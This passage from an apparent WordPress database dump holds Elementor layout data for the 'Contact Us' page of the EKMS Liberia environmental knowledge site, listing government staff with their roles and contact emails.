Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14839,2354,'_elementor_edit_mode','builder'),(14840,2354,'_elementor_template_type','wp-page'),(14841,2354,'_elementor_version','2.7.5'),(14842,2354,'_wp_page_template','default'),(14843,2354,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming 